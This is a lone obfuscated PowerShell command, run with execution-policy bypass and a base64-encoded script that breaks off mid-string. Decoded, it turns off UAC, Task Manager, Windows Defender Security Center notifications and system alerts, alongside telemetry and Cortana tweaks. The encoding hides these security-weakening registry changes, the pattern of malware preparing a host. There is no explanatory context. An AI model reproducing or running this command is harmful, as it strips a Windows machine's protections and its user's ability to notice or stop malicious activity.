        powershell.exe -exec bypass -enc YwBoAGMAcAAgADYANQAwADAAMQAKACQAUAByAG8AZwByAGUAcwBzAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAJwBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACcACgAKAFMAZQB0AC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIAAtAFMAYwBvAHAAZQAgAEMAdQByAHIAZQBuAHQAVQBzAGUAcgAgAEIAeQBwAGEAcwBzACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABMAG8AYwBhAGwATQBhAGMAaABpAG4AZQAgAEIAeQBwAGEAcwBzACAALQBGAG8AcgBjAGUACgAKAE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAiAEgASwBMAE0AOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFAAdQBzAGgATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAiACAALQBOAGEAbQBlACAAIgBUAG8AYQBzAHQARQBuAGEAYgBsAGUAZAAiACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgACIARABXAG8AcgBkACIAIAAtAFYAYQBsAHUAZQAgADAAIAAtAEYAbwByAGMAZQAKAFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAiAEgASwBMAE0AOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFAAdQBzAGgATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAiACAALQBOAGEAbQBlACAAIgBUAG8AYQBzAHQARQBuAGEAYgBsAGUAZAAiACAALQBUAHkAcABlACAARABXAG8AcgBkACAALQBWAGEAbAB1AGUAIAAwACAALQBGAG8AcgBjAGUACgBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABQAHUAcwBoAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAIgAgAC0ATgBhAG0AZQAgACIAVABvAGEAcwB0AEUAbgBhAGIAbABlAGQAIgAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIAAiAEQAVwBvAHIAZAAiACAALQBWAGEAbAB1AGUAIAAwACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABQAHUAcwBoAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAIgAgAC0ATgBhAG0AZQAgACIAVABvAGEAcwB0AEUAbgBhAGIAbABlAGQAIgAgAC0AVAB5AHAAZQAgAEQAVwBvAHIAZAAgAC0AVgBhAGwAdQBlACAAMAAgAC0ARgBvAHIAYwBlAAoACgBOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAiAEgASwBMAE0AOgBcAFMAWQBTAFQARQBNAFwAQwB1AHIAcgBlAG4AdABDAG8AbgB0AHIAbwBsAFMAZQB0AFwAQwBvAG4AdAByAG8AbABcACIAIAAtAE4AYQBtAGUAIAAiAEcAcgBhAHAAaABpAGMAcwBEAHIAaQB2AGUAcgBzACIAIAAtAEYAbwByAGMAZQAKAE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAiAEgASwBMAE0AOgBcAFMAWQBTAFQARQBNAFwAQwB1AHIAcgBlAG4AdABDAG8AbgB0AHIAbwBsAFMAZQB0AFwAQwBvAG4AdAByAG8AbABcAEcAcgBhAHAAaABpAGMAcwBEAHIAaQB2AGUAcgBzACIAIAAtAE4AYQBtAGUAIAAiAEgAdwBTAGMAaABNAG8AZABlACIAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAxACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsATABNADoAXABTAFkAUwBUAEUATQBcAEMAdQByAHIAZQBuAHQAQwBvAG4AdAByAG8AbABTAGUAdABcAEMAbwBuAHQAcgBvAGwAXABHAHIAYQBwAGgAaQBjAHMARAByAGkAdgBlAHIAcwAiACAALQBOAGEAbQBlACAAIgBIAHcAUwBjAGgATQBvAGQAZQAiACAALQBUAHkAcABlACAARABXAG8AcgBkACAALQBWAGEAbAB1AGUAIAAxACAALQBGAG8AcgBjAGUACgBOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMAWQBTAFQARQBNAFwAQwB1AHIAcgBlAG4AdABDAG8AbgB0AHIAbwBsAFMAZQB0AFwAQwBvAG4AdAByAG8AbABcACIAIAAtAE4AYQBtAGUAIAAiAEcAcgBhAHAAaABpAGMAcwBEAHIAaQB2AGUAcgBzACIAIAAtAEYAbwByAGMAZQAKAE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAiAEgASwBDAFUAOgBcAFMAWQBTAFQARQBNAFwAQwB1AHIAcgBlAG4AdABDAG8AbgB0AHIAbwBsAFMAZQB0AFwAQwBvAG4AdAByAG8AbABcAEcAcgBhAHAAaABpAGMAcwBEAHIAaQB2AGUAcgBzACIAIAAtAE4AYQBtAGUAIAAiAEgAdwBTAGMAaABNAG8AZABlACIAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAxACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsAQwBVADoAXABTAFkAUwBUAEUATQBcAEMAdQByAHIAZQBuAHQAQwBvAG4AdAByAG8AbABTAGUAdABcAEMAbwBuAHQAcgBvAGwAXABHAHIAYQBwAGgAaQBjAHMARAByAGkAdgBlAHIAcwAiACAALQBOAGEAbQBlACAAIgBIAHcAUwBjAGgATQBvAGQAZQAiACAALQBUAHkAcABlACAARABXAG8AcgBkACAALQBWAGEAbAB1AGUAIAAxACAALQBGAG8AcgBjAGUACgAKAE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACIASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUABvAGwAaQBjAGkAZQBzACIAIAAtAE4AYQBtAGUAIAAiAFMAeQBzAHQAZQBtACIAIAAtAEYAbwByAGMAZQAKAE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAiAEgASwBMAE0AOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFAAbwBsAGkAYwBpAGUAcwBcAFMAeQBzAHQAZQBtACIAIAAtAE4AYQBtAGUAIAAiAEQAaQBzAGEAYgBsAGUAVABhAHMAawBNAGcAcgAiACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgACIARABXAG8AcgBkACIAIAAtAFYAYQBsAHUAZQAgADEAIAAtAEYAbwByAGMAZQAKAFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAiAEgASwBMAE0AOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFAAbwBsAGkAYwBpAGUAcwBcAFMAeQBzAHQAZQBtACIAIAAtAE4AYQBtAGUAIAAiAEQAaQBzAGEAYgBsAGUAVABhAHMAawBNAGcAcgAiACAALQBUAHkAcABlACAARABXAG8AcgBkACAALQBWAGEAbAB1AGUAIAAxACAALQBGAG8AcgBjAGUACgBOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFAAbwBsAGkAYwBpAGUAcwAiACAALQBOAGEAbQBlACAAIgBTAHkAcwB0AGUAbQAiACAALQBGAG8AcgBjAGUACgBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABQAG8AbABpAGMAaQBlAHMAXABTAHkAcwB0AGUAbQAiACAALQBOAGEAbQBlACAAIgBEAGkAcwBhAGIAbABlAFQAYQBzAGsATQBnAHIAIgAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIAAiAEQAVwBvAHIAZAAiACAALQBWAGEAbAB1AGUAIAAxACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABQAG8AbABpAGMAaQBlAHMAXABTAHkAcwB0AGUAbQAiACAALQBOAGEAbQBlACAAIgBEAGkAcwBhAGIAbABlAFQAYQBzAGsATQBnAHIAIgAgAC0AVAB5AHAAZQAgAEQAVwBvAHIAZAAgAC0AVgBhAGwAdQBlACAAMQAgAC0ARgBvAHIAYwBlAAoACgBOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAiAEgASwBMAE0AOgBcAFMAbwBmAHQAdwBhAHIAZQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAiACAALQBOAGEAbQBlACAAIgBFAHgAcABsAG8AcgBlAHIAIgAgAC0ARgBvAHIAYwBlAAoATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEwATQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwARQB4AHAAbABvAHIAZQByACIAIAAtAE4AYQBtAGUAIAAiAEQAaQBzAGEAYgBsAGUATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AQwBlAG4AdABlAHIAIgAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIAAiAEQAVwBvAHIAZAAiACAALQBWAGEAbAB1AGUAIAAxACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsATABNADoAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABFAHgAcABsAG8AcgBlAHIAIgAgAC0ATgBhAG0AZQAgACIARABpAHMAYQBiAGwAZQBOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBDAGUAbgB0AGUAcgAiACAALQBUAHkAcABlACAARABXAG8AcgBkACAALQBWAGEAbAB1AGUAIAAxACAALQBGAG8AcgBjAGUACgBOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAiACAALQBOAGEAbQBlACAAIgBFAHgAcABsAG8AcgBlAHIAIgAgAC0ARgBvAHIAYwBlAAoATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwARQB4AHAAbABvAHIAZQByACIAIAAtAE4AYQBtAGUAIAAiAEQAaQBzAGEAYgBsAGUATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AQwBlAG4AdABlAHIAIgAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIAAiAEQAVwBvAHIAZAAiACAALQBWAGEAbAB1AGUAIAAxACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABFAHgAcABsAG8AcgBlAHIAIgAgAC0ATgBhAG0AZQAgACIARABpAHMAYQBiAGwAZQBOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBDAGUAbgB0AGUAcgAiACAALQBUAHkAcABlACAARABXAG8AcgBkACAALQBWAGEAbAB1AGUAIAAxACAALQBGAG8AcgBjAGUACgAKAE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACIASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByACAAUwBlAGMAdQByAGkAdAB5ACAAQwBlAG4AdABlAHIAIgAgAC0ATgBhAG0AZQAgACIATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAiACAALQBGAG8AcgBjAGUACgBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAIABTAGUAYwB1AHIAaQB0AHkAIABDAGUAbgB0AGUAcgBcAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAIgAgAC0ATgBhAG0AZQAgACIARABpAHMAYQBiAGwAZQBFAG4AaABhAG4AYwBlAGQATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAiACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgACIARABXAG8AcgBkACIAIAAtAFYAYQBsAHUAZQAgADEAIAAtAEYAbwByAGMAZQAKAFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAiAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgAgAFMAZQBjAHUAcgBpAHQAeQAgAEMAZQBuAHQAZQByAFwATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAiACAALQBOAGEAbQBlACAAIgBEAGkAcwBhAGIAbABlAEUAbgBoAGEAbgBjAGUAZABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzACIAIAAtAFQAeQBwAGUAIABEAFcAbwByAGQAIAAtAFYAYQBsAHUAZQAgADEAIAAtAEYAbwByAGMAZQAKAE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACIASABLAEMAVQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByACAAUwBlAGMAdQByAGkAdAB5ACAAQwBlAG4AdABlAHIAIgAgAC0ATgBhAG0AZQAgACIATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAiACAALQBGAG8AcgBjAGUACgBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAIABTAGUAYwB1AHIAaQB0AHkAIABDAGUAbgB0AGUAcgBcAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAIgAgAC0ATgBhAG0AZQAgACIARABpAHMAYQBiAGwAZQBFAG4AaABhAG4AYwBlAGQATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAiACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgACIARABXAG8AcgBkACIAIAAtAFYAYQBsAHUAZQAgADEAIAAtAEYAbwByAGMAZQAKAFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAiAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgAgAFMAZQBjAHUAcgBpAHQAeQAgAEMAZQBuAHQAZQByAFwATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAiACAALQBOAGEAbQBlACAAIgBEAGkAcwBhAGIAbABlAEUAbgBoAGEAbgBjAGUAZABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzACIAIAAtAFQAeQBwAGUAIABEAFcAbwByAGQAIAAtAFYAYQBsAHUAZQAgADEAIAAtAEYAbwByAGMAZQAKAAoATgBlAHcALQBJAHQAZQBtACAALQBQAGEAdABoACAAIgBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAIABTAGUAYwB1AHIAaQB0AHkAIABDAGUAbgB0AGUAcgAiACAALQBOAGEAbQBlACAAIgBOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzACIAIAAtAEYAbwByAGMAZQAKAE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAiAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgAgAFMAZQBjAHUAcgBpAHQAeQAgAEMAZQBuAHQAZQByAFwATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAiACAALQBOAGEAbQBlACAAIgBEAGkAcwBhAGIAbABlAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAIgAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIAAiAEQAVwBvAHIAZAAiACAALQBWAGEAbAB1AGUAIAAxACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAIABTAGUAYwB1AHIAaQB0AHkAIABDAGUAbgB0AGUAcgBcAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAIgAgAC0ATgBhAG0AZQAgACIARABpAHMAYQBiAGwAZQBOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzACIAIAAtAFQAeQBwAGUAIABEAFcAbwByAGQAIAAtAFYAYQBsAHUAZQAgADEAIAAtAEYAbwByAGMAZQAKAE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACIASABLAEMAVQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByACAAUwBlAGMAdQByAGkAdAB5ACAAQwBlAG4AdABlAHIAIgAgAC0ATgBhAG0AZQAgACIATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAiACAALQBGAG8AcgBjAGUACgBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAIABTAGUAYwB1AHIAaQB0AHkAIABDAGUAbgB0AGUAcgBcAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAIgAgAC0ATgBhAG0AZQAgACIARABpAHMAYQBiAGwAZQBOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzACIAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAAIgBEAFcAbwByAGQAIgAgAC0AVgBhAGwAdQBlACAAMQAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEMAVQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByACAAUwBlAGMAdQByAGkAdAB5ACAAQwBlAG4AdABlAHIAXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzACIAIAAtAE4AYQBtAGUAIAAiAEQAaQBzAGEAYgBsAGUATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAiACAALQBUAHkAcABlACAARABXAG8AcgBkACAALQBWAGEAbAB1AGUAIAAxACAALQBGAG8AcgBjAGUACgAKAE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAiAEgASwBMAE0AOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFAAbwBsAGkAYwBpAGUAcwBcAFMAeQBzAHQAZQBtACIAIAAtAE4AYQBtAGUAIAAiAEUAbgBhAGIAbABlAEwAVQBBACIAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAG8AcgBkACAALQBWAGEAbAB1AGUAIAAwACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsATABNADoAXABTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABQAG8AbABpAGMAaQBlAHMAXABTAHkAcwB0AGUAbQAiACAALQBOAGEAbQBlACAAIgBFAG4AYQBiAGwAZQBMAFUAQQAiACAALQBUAHkAcABlACAARABXAG8AcgBkACAALQBWAGEAbAB1AGUAIAAwACAALQBGAG8AcgBjAGUACgBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABQAG8AbABpAGMAaQBlAHMAXABTAHkAcwB0AGUAbQAiACAALQBOAGEAbQBlACAAIgBFAG4AYQBiAGwAZQBMAFUAQQAiACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgAEQAVwBvAHIAZAAgAC0AVgBhAGwAdQBlACAAMAAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUABvAGwAaQBjAGkAZQBzAFwAUwB5AHMAdABlAG0AIgAgAC0ATgBhAG0AZQAgACIARQBuAGEAYgBsAGUATABVAEEAIgAgAC0AVAB5AHAAZQAgAEQAVwBvAHIAZAAgAC0AVgBhAGwAdQBlACAAMAAgAC0ARgBvAHIAYwBlAAoACgBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsATABNADoAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABEAGEAdABhACAAQwBvAGwAbABlAGMAdABpAG8AbgAiACAALQBOAGEAbQBlACAAIgBBAGwAbABvAHcAVABlAGwAZQBtAGUAdAByAHkAIgAgAC0AVgBhAGwAdQBlACAAMQAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIABEAFcATwBSAEQAIAAtAEYAbwByAGMAZQAKAFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAiAEgASwBMAE0AOgBcAFMAbwBmAHQAdwBhAHIAZQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEQAYQB0AGEAIABDAG8AbABsAGUAYwB0AGkAbwBuACIAIAAtAE4AYQBtAGUAIAAiAEEAbABsAG8AdwBUAGUAbABlAG0AZQB0AHIAeQAiACAALQBUAHkAcABlACAARABXAG8AcgBkACAALQBWAGEAbAB1AGUAIAAxACAALQBGAG8AcgBjAGUACgBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABEAGEAdABhACAAQwBvAGwAbABlAGMAdABpAG8AbgAiACAALQBOAGEAbQBlACAAIgBBAGwAbABvAHcAVABlAGwAZQBtAGUAdAByAHkAIgAgAC0AVgBhAGwAdQBlACAAMQAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIABEAFcATwBSAEQAIAAtAEYAbwByAGMAZQAKAFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAiAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEQAYQB0AGEAIABDAG8AbABsAGUAYwB0AGkAbwBuACIAIAAtAE4AYQBtAGUAIAAiAEEAbABsAG8AdwBUAGUAbABlAG0AZQB0AHIAeQAiACAALQBUAHkAcABlACAARABXAG8AcgBkACAALQBWAGEAbAB1AGUAIAAxACAALQBGAG8AcgBjAGUACgAKAE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAiAEgASwBMAE0AOgBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAFcAaQBuAGQAbwB3AHMAIABTAGUAYQByAGMAaAAiACAALQBOAGEAbQBlACAAIgBBAGwAbABvAHcAQwBvAHIAdABhAG4AYQAiACAALQBWAGEAbAB1AGUAIAAwACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgAEQAVwBPAFIARAAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEwATQA6AFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAVwBpAG4AZABvAHcAcwAgAFMAZQBhAHIAYwBoACIAIAAtAE4AYQBtAGUAIAAiAEEAbABsAG8AdwBDAG8AcgB0AGEAbgBhACIAIAAtAFQAeQBwAGUAIABEAFcAbwByAGQAIAAtAFYAYQBsAHUAZQAgADAAIAAtAEYAbwByAGMAZQAKAE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAiAEgASwBDAFUAOgBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAFcAaQBuAGQAbwB3AHMAIABTAGUAYQByAGMAaAAiACAALQBOAGEAbQBlACAAIgBBAGwAbABvAHcAQwBvAHIAdABhAG4AYQAiACAALQBWAGEAbAB1AGUAIAAwACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgAEQAVwBPAFIARAAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQBy